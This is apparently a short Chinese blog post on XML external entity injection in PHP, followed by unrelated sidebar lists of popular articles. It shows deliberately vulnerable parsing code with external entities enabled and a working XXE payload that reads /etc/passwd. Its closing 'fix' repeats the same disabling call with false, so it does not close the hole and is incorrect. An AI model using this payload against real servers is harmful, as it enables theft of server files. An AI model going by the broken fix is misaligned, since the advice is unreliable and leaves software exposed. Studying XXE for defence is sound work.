XML实体注入漏洞
<?php
libxml_disable_entity_loader(false);
//第一种
$data = isset($_POST['data'])?trim($_POST['data']):'';
$resp = '';
if($data != false){
$xml = simplexml_load_string($data, 'SimpleXMLElement', LIBXML_NOENT); //必须要有这个SimpleXMLElement
var_dump($xml);
}
//第二种
$data = isset($_POST['data'])?trim($_POST['data']):'';
$resp = '';
if($data != false){
$xml = new SimpleXMLElement($data, LIBXML_NOENT);
var_dump($xml);
}
?>
那么POST的data数据为:
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY content SYSTEM "file:///etc/passwd">
]>
<note>
<name>&content;</name>
</note>
如果需要修复,只需要在前面加上:
libxml_disable_entity_loader(false);
每日一句
-
一切的美德都包含在自我信赖里。
——爱默森
今日排行
- 常见几何图形之球
球是以半圆的直径所在直线为旋转轴,半圆面旋转一周形成的旋转体,也叫做球体(solid sphere)。球的表面是一个曲面,这个曲面就叫做球面,球的中心叫做球心。 - dig:域名查询工具
dig命令是用于域名查询,可以用于测试域名系统的工作是否正常。如果没有dig命令,请使用:yum install bind-utils 进行安装 - tcpdump:监听网络流量
tcpdum命令是一个截获网络数据包的包分析工具。tcpdump可以将网络中传递的数据包的头完全截获下来提供分析。他支持针对网络层、协议、主机、端口等过滤,并支持与、或、非逻辑语句协助过滤的有效信息。 如果系统没有tcpdump命令,则可以使用下面的命令来安装: yum -y install tcpdump
- PHP的array_walk_recursive函数
php中的array_walk_recursive函数对数组中的每个成员递归地应用用户函数 - 数学家——高斯
约翰·卡尔·弗里德里希·高斯(德语:Johann Carl Friedrich Gauß; ,英语:Gauss,拉丁语:Carolus Fridericus Gauss,1777年4月30日—1855年2月23日),德国著名数学家、物理学家、天文学家、几何学家,大地测量学家,毕业于Carolinum学院(现布伦瑞克工业大学)。
点击排行
- VSCode插件 - 快速生成表格并格式化
快速生成表格 - Electron打包错误“Error: Application entry file ..”解决方案
打包出现如下错误:Error: Application entry file "dist\electron\main.js" in the "D:\gui\demo2\build\win-unpacked\resources\app.asar" does not exist. Seems like a wrong configuration. - Electron页面跳转、浏览器打开链接和打开新窗口
Electron页面跳转、浏览器打开链接和打开新窗口
- Docker编译出现:temporary error (try again later)
Docker编译镜像出现:fetch http://dl-cdn.alpinelinux.org/alpine/v3.12/main/x86_64/APKINDEX.tar.gz
ERROR: http://dl-cdn.alpinelinux.org/alpine/v3.12/main: temporary error (try again later)
WARNING: Ignoring APKINDEX.2c4ac24e.tar.gz: No such file or directory问题 - mac git用户名和密码修改
在Mac电脑中,如何对Git的用户名和密码进行修改呢?起初不懂Mac,所以整了很久,本文将记录如何对这个进行操作,以便后期使用。 - Git保存和清除用户名、密码
在使用Git的过程中,不想每次都输入用户名和密码去拉取代码,所以就需要保存这些信息,那么既然有保存了,就必须有清除功能。